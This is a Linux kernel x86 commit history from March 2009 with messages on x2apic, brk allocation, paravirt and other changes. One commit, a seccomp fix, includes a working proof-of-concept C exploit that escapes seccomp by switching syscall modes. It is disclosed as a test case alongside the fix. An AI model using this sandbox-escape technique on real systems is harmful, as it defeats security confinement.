1. 19 3月, 2009 1 次提交
  2. 18 3月, 2009 6 次提交
    • S
      x86: add x2apic_wrmsr_fence() to x2apic flush tlb paths · ce4e240c
      Suresh Siddha 提交于
      Impact: optimize APIC IPI related barriers
      
      Uncached MMIO accesses for xapic are inherently serializing and hence
      we don't need explicit barriers for xapic IPI paths.
      
      x2apic MSR writes/reads don't have serializing semantics and hence need
      a serializing instruction or mfence, to make all the previous memory
      stores globally visisble before the x2apic msr write for IPI.
      
      Add x2apic_wrmsr_fence() in flush tlb path to x2apic specific paths.
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Oleg Nesterov <oleg@redhat.com>
      Cc: Jens Axboe <jens.axboe@oracle.com>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
      Cc: Rusty Russell <rusty@rustcorp.com.au>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Cc: "steiner@sgi.com" <steiner@sgi.com>
      Cc: Nick Piggin <npiggin@suse.de>
      LKML-Reference: <1237313814.27006.203.camel@localhost.localdomain>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      ce4e240c
    • S
      x86, ioapic: Fix non atomic allocation with interrupts disabled · 05c3dc2c
      Suresh Siddha 提交于
      Impact: fix possible race
      
      save_mask_IO_APIC_setup() was using non atomic memory allocation while getting
      called with interrupts disabled. Fix this by splitting this into two different
      function. Allocation part save_IO_APIC_setup() now happens before
      disabling interrupts.
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Signed-off-by: NH. Peter Anvin <hpa@linux.intel.com>
      05c3dc2c
    • S
      x86, x2apic: cleanup the IO-APIC level migration with interrupt-remapping · 0280f7c4
      Suresh Siddha 提交于
      Impact: simplification
      
      In the current code, for level triggered migration, we need to modify the
      io-apic RTE with the update vector information, along with modifying interrupt
      remapping table entry(IRTE) with vector and destination. This is to ensure that
      remote IRR bit inthe IOAPIC RTE gets cleared when the cpu does EOI.
      
      With this patch, for level triggered, we eliminate the io-apic RTE modification
      (with the updated vector information), by using a virtual vector (io-apic pin
      number).  Real vector that is used for interrupting cpu will be coming from
      the interrupt-remapping table entry. Trigger mode in the IRTE will always be
      edge, and the actual level or edge trigger will be setup in the IO-APIC RTE.
      So a level triggered interrupt will appear as an edge to the local apic
      cpu but still as level to the IO-APIC.
      
      With this change, level irq migration can be done by simply modifying
      the interrupt-remapping table entry with out changing the io-apic RTE.
      And as the interrupt appears as edge at the cpu, in addition to do the
      local apic EOI, we need to do IO-APIC directed EOI to clear the remote
      IRR bit in  the IO-APIC RTE.
      
      This simplies the irq migration in the presence of interrupt-remapping.
      Idea-by: NRajesh Sankaran <rajesh.sankaran@intel.com>
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Eric W. Biederman <ebiederm@xmission.com>
      Signed-off-by: NH. Peter Anvin <hpa@linux.intel.com>
      0280f7c4
    • S
      x86, x2apic: fix clear_local_APIC() in the presence of x2apic · cf6567fe
      Suresh Siddha 提交于
      Impact: cleanup, paranoia
      
      We were not clearing the local APIC in clear_local_APIC() in the
      presence of x2apic. Fix it.
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Signed-off-by: NH. Peter Anvin <hpa@linux.intel.com>
      cf6567fe
    • S
      x86, x2apic: enable fault handling for intr-remapping · 9d783ba0
      Suresh Siddha 提交于
      Impact: interface augmentation (not yet used)
      
      Enable fault handling flow for intr-remapping aswell. Fault handling
      code now shared by both dma-remapping and intr-remapping.
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Signed-off-by: NH. Peter Anvin <hpa@linux.intel.com>
      9d783ba0
    • J
      x86/brk: make the brk reservation symbols inaccessible from C · 0b1c723d
      Jeremy Fitzhardinge 提交于
      Impact: bulletproofing, clarification
      
      The brk reservation symbols are just there to document the amount
      of space reserved by brk users in the final vmlinux file.  Their
      addresses are irrelevent, and using their addresses will cause
      certain havok.  Name them ".brk.NAME", which is a valid asm symbol
      but C can't reference it; it also highlights their special
      role in the symbol table.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      0b1c723d
  3. 17 3月, 2009 1 次提交
    • J
      x86, paravirt: prevent gcc from generating the wrong addressing mode · 42854dc0
      Jeremy Fitzhardinge 提交于
      Impact: fix crash on VMI (VMware)
      
      When we generate a call sequence for calling a paravirtualized
      function, we presume that the generated code is "call *0xXXXXX",
      which is a 6 byte opcode; this is larger than a normal
      direct call, and so we can patch a direct call over it.
      
      At the moment, however we give gcc enough rope to hang us by
      putting the address in a register and generating a two byte
      indirect-via-register call.  Prevent this by explicitly
      dereferencing the function pointer and passing it into the
      asm as a constant.
      
      This prevents crashes in VMI, as it cannot handle unpatchable
      callsites.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Cc: Alok Kataria <akataria@vmware.com>
      LKML-Reference: <49BEEDC2.2070809@goop.org>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      42854dc0
  4. 15 3月, 2009 6 次提交
    • J
      x86: allow extend_brk users to reserve brk space · 796216a5
      Jeremy Fitzhardinge 提交于
      Impact: new interface; remove hard-coded limit
      
      Add RESERVE_BRK(name, size) macro to reserve space in the brk
      area.  This should be a conservative (ie, larger) estimate of
      how much space might possibly be required from the brk area.
      Any unused space will be freed, so there's no real downside
      on making the reservation too large (within limits).
      
      The name should be unique within a given file, and somewhat
      descriptive.
      
      The C definition of RESERVE_BRK() ends up being more complex than
      one would expect to work around a cluster of gcc infelicities:
      
        The first attempt was to simply try putting __section(.brk_reservation)
        on a variable.  This doesn't work because it ends up making it a
        @progbits section, which gets actual space allocated in the vmlinux
        executable.
      
        The second attempt was to emit the space into a section using asm,
        but gcc doesn't allow arguments to be passed to file-level asm()
        statements, making it hard to pass in the size.
      
        The final attempt is to wrap the asm() in a function to allow
        it to have arguments, and put the function itself into the
        .discard section, which vmlinux*.lds drops entirely from the
        emitted vmlinux.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      796216a5
    • Y
      x86-32: compute initial mapping size more accurately · 7543c1de
      Yinghai Lu 提交于
      Impact: simplification
      
      We only need to map the kernel in head_32.S, not the whole of
      lowmem.  We use 512MB as a reasonable (but arbitrary) limit on
      the maximum size of the kernel image.
      Signed-off-by: NYinghai Lu <yinghai@kernel.org>
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      7543c1de
    • J
      x86: use brk allocation for DMI · 6de6cb44
      Jeremy Fitzhardinge 提交于
      Impact: use new interface instead of previous ad hoc implementation
      
      Use extend_brk() to allocate memory for DMI rather than having an
      ad-hoc allocator.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      6de6cb44
    • J
      x86-32: use brk segment for allocating initial kernel pagetable · ccf3fe02
      Jeremy Fitzhardinge 提交于
      Impact: use new interface instead of previous ad hoc implementation
      
      Rather than having special purpose init_pg_table_start/end variables
      to delimit the kernel pagetable built by head_32.S, just use the brk
      mechanism to extend the bss for the new pagetable.
      
      This patch removes init_pg_table_start/end and pg0, defines __brk_base
      (which is page-aligned and immediately follows _end), initializes
      the brk region to start there, and uses it for the 32-bit pagetable.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      ccf3fe02
    • J
      x86: add brk allocation for very, very early allocations · 93dbda7c
      Jeremy Fitzhardinge 提交于
      Impact: new interface
      
      Add a brk()-like allocator which effectively extends the bss in order
      to allow very early code to do dynamic allocations.  This is better than
      using statically allocated arrays for data in subsystems which may never
      get used.
      
      The space for brk allocations is in the bss ELF segment, so that the
      space is mapped properly by the code which maps the kernel, and so
      that bootloaders keep the space free rather than putting a ramdisk or
      something into it.
      
      The bss itself, delimited by __bss_stop, ends before the brk area
      (__brk_base to __brk_limit).  The kernel text, data and bss is reserved
      up to __bss_stop.
      
      Any brk-allocated data is reserved separately just before the kernel
      pagetable is built, as that code allocates from unreserved spaces
      in the e820 map, potentially allocating from any unused brk memory.
      Ultimately any unused memory in the brk area is used in the general
      kernel memory pool.
      
      Initially the brk space is set to 1MB, which is probably much larger
      than any user needs (the largest current user is i386 head_32.S's code
      to build the pagetables to map the kernel, which can get fairly large
      with a big kernel image and no PSE support).  So long as the system
      has sufficient memory for the bootloader to reserve the kernel+1MB brk,
      there are no bad effects resulting from an over-large brk.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      93dbda7c
    • J
      x86: cpu_debug add support for various AMD CPUs · f4c3c4cd
      Jaswinder Singh Rajput 提交于
      Impact: Added AMD CPUs support
      
      Added flags for various AMD CPUs.
      Signed-off-by: NJaswinder Singh Rajput <jaswinderrajput@gmail.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      f4c3c4cd
  5. 14 3月, 2009 1 次提交
  6. 13 3月, 2009 2 次提交
  7. 12 3月, 2009 2 次提交
    • J
      x86: fix HYPERVISOR_update_descriptor() · 6a5c05f0
      Jan Beulich 提交于
      Impact: fix potential oops during app-initiated LDT manipulation
      
      The underlying hypercall has differing argument requirements on 32-
      and 64-bit.
      Signed-off-by: NJan Beulich <jbeulich@novell.com>
      Acked-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      LKML-Reference: <49B9061E.76E4.0078.0@novell.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      6a5c05f0
    • H
      x86: remove zImage support · 5e47c478
      H. Peter Anvin 提交于
      Impact: obsolete feature removal
      
      The zImage kernel format has been functionally unused for a very long
      time.  It is just barely possible to build a modern kernel that still
      fits within the zImage size limit, but it is highly unlikely that
      anyone ever uses it.  Furthermore, although it is still supported by
      most bootloaders, it has been at best poorly tested (or not tested at
      all); some bootloaders are even known to not support zImage at all and
      not having even noticed.
      
      Also remove some really obsolete constants that no longer have any
      meaning.
      
      LKML-Reference: <49B703D4.1000008@zytor.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      5e47c478
  8. 11 3月, 2009 5 次提交
  9. 10 3月, 2009 1 次提交
    • T
      percpu: make x86 addr <-> pcpu ptr conversion macros generic · e0100983
      Tejun Heo 提交于
      Impact: generic addr <-> pcpu ptr conversion macros
      
      There's nothing arch specific about x86 __addr_to_pcpu_ptr() and
      __pcpu_ptr_to_addr().  With proper __per_cpu_load and __per_cpu_start
      defined, they'll do the right thing regardless of actual layout.
      
      Move these macros from arch/x86/include/asm/percpu.h to mm/percpu.c
      and allow archs to override it as necessary.
      Signed-off-by: NTejun Heo <tj@kernel.org>
      e0100983
  10. 07 3月, 2009 1 次提交
    • C
      x86: linkage.h - guard assembler specifics by __ASSEMBLY__ · 7ab15247
      Cyrill Gorcunov 提交于
      Stephen Rothwell reported:
      
      |Today's linux-next build (x86_64 allmodconfig) produced this warning:
      |
      |In file included from drivers/char/epca.c:49:
      |drivers/char/digiFep1.h:7:1: warning: "GLOBAL" redefined
      |In file included from include/linux/linkage.h:5,
      |                 from include/linux/kernel.h:11,
      |                 from arch/x86/include/asm/system.h:10,
      |                 from arch/x86/include/asm/processor.h:17,
      |                 from include/linux/prefetch.h:14,
      |                 from include/linux/list.h:6,
      |                 from include/linux/module.h:9,
      |                 from drivers/char/epca.c:29:
      |arch/x86/include/asm/linkage.h:55:1: warning: this is the location of the previous definition
      |
      |Probably introduced by commit 95695547
      |("x86: asm linkage - introduce GLOBAL macro") from the x86 tree.
      
      Any assembler specific snippets being placed in headers
      are to be protected by __ASSEMBLY__. Fixed.
      
      Also move __ALIGN definition under the same protection as well.
      Reported-by: NStephen Rothwell <sfr@canb.auug.org.au>
      Signed-off-by: NCyrill Gorcunov <gorcunov@openvz.org>
      LKML-Reference: <20090306160833.GB7420@localhost>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      7ab15247
  11. 05 3月, 2009 9 次提交
  12. 04 3月, 2009 1 次提交
  13. 03 3月, 2009 2 次提交
    • P
      x86: set_highmem_pages_init() cleanup · 867c5b52
      Pekka Enberg 提交于
      Impact: cleanup
      
      This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c.
      
      The declaration of the function is kept in asm/numa_32.h because
      asm/highmem.h is included only if CONFIG_HIGHMEM is enabled so we
      can't put the empty static inline function there.
      Signed-off-by: NPekka Enberg <penberg@cs.helsinki.fi>
      LKML-Reference: <1236082212.2675.24.camel@penberg-laptop>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      867c5b52
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  14. 02 3月, 2009 2 次提交